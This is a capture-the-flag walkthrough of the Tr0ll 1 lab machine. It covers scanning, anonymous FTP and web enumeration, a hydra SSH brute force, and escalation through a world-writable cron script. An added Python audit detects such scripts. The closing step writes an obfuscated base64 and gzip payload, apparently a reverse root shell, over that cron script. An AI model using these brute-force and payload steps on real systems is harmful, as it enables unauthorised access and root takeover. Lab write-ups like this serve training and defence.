NOTES ABOUT Tr0ll 1
[ 2022-09-26 ] [ VulnHub / Tr0ll 1 ] Status: Rooted
Skills: Port Scanning, FTP, Brute Force, File Search
Tools: nmap, wireshark, hydra, find
PORT SCANNING
$ nmap -v -sS -A -p- 10.0.2.6
[...]
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap [NSE: writeable]
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
[...]
GETTING IN
$ ftp anonymous@10.0.2.6
ls
get lol.pcap
$ wireshark lol.pcap
WEB: http://10.0.2.6/sup3rs3cr3tdirlol/
$ wget http://10.0.2.6/sup3rs3cr3tdirlol/roflmao
$ strings roflmao
[...]
Find address 0x0856BF to proceed
[...]
WEB: http://10.0.2.6/0x0856BF/
SSH DICTIONARY BRUTE FORCE
$ hydra -L /home/kali/CTF/Tr0ll1/users.txt -p "Pass.txt" 10.0.2.6 ssh
[...]
[22][ssh] host: 10.0.2.6 login: overflow password: Pass.txt
1 of 1 target successfully completed, 1 valid password found
[...]
SEARCHING VULNS
$ find / -writable 2>/dev/null
$ find / -type f -perm 0777 2>/dev/null
/srv/ftp/lol.pcap
/var/tmp/cleaner.py.swp
/var/www/html/sup3rs3cr3tdirlol/roflmao
/var/log/cronlog
/lib/log/cleaner.py
$ cat /var/log/cronlog
*/2 * * * * cleaner.py
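DEFENSIVE CHECK (added example, not part of the original notes)
The finding above is a cron job whose script is mode 0777. This Python audit flags cron scripts that other users can alter, either directly or through a world-writable directory. The user-crontab line layout, the rotate.py name and the temporary directory tree are assumptions constructed for the demo.

```python
import os
import stat
import tempfile


def cron_commands(crontab_text):
    """Yield the command word of each job line (user-crontab layout assumed)."""
    for line in crontab_text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        if fields[0].startswith("@") and len(fields) >= 2:
            yield fields[1]          # @reboot /path/to/job
        elif len(fields) >= 6:
            yield fields[5]          # five schedule fields, then the command


def audit(crontab_text, search_roots):
    """Return sorted (path, reason) pairs for cron scripts other users can alter."""
    findings = set()
    for cmd in cron_commands(crontab_text):
        if os.path.isabs(cmd):
            paths = [cmd] if os.path.isfile(cmd) else []
        else:  # bare name, as in the cronlog entry: look for it under the roots
            paths = [os.path.join(d, cmd) for root in search_roots
                     for d, _, files in os.walk(root) if cmd in files]
        for path in paths:
            if os.stat(path).st_mode & stat.S_IWOTH:
                findings.add((path, "file is world-writable"))
            dmode = os.stat(os.path.dirname(path)).st_mode
            if dmode & stat.S_IWOTH and not dmode & stat.S_ISVTX:
                findings.add((path, "directory is world-writable, no sticky bit"))
    return sorted(findings)


def demo():
    """Build a constructed tree with one 0777 and one 0755 cron script, audit it."""
    with tempfile.TemporaryDirectory() as root:
        logdir = os.path.join(root, "lib", "log")
        os.makedirs(logdir)
        os.chmod(logdir, 0o755)  # fixed mode so the result does not depend on umask
        weak, safe = (os.path.join(logdir, n) for n in ("cleaner.py", "rotate.py"))
        for path, mode in ((weak, 0o777), (safe, 0o755)):
            open(path, "w").close()
            os.chmod(path, mode)
        crontab = "# constructed sample\n*/2 * * * * cleaner.py\n0 3 * * * %s\n" % safe
        return [(os.path.relpath(p, root), why) for p, why in audit(crontab, [root])]


if __name__ == "__main__":
    for path, why in demo():
        print(path, "->", why)
```

On a real host, pass the crontab text and the directories to search to audit(); a flagged script should be owned by root and have write permission removed for group and other.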
REVERSE ROOT SHELL
$ ssh overflow@10.0.2.6
echo H4sIAAAAAAAAA8vMLcgvKlEozk/OTi3RyS/WKSiptC62hfD1IJQGlOfoFu/p5xqiA+UG+zt7xweHBLk6+mpaF+sl5+flpSaXaGgoGRroGegZ6RmaKumYmBhralrnF+ullBYYaRTrpWXmpObla2jqGGAVNcQqaqRpDXSVXnFBYnmehpJ+UmaefnGGkiYXAEwY6cC8AAAA | base64 -d | gzip -d > /lib/log/cleaner.py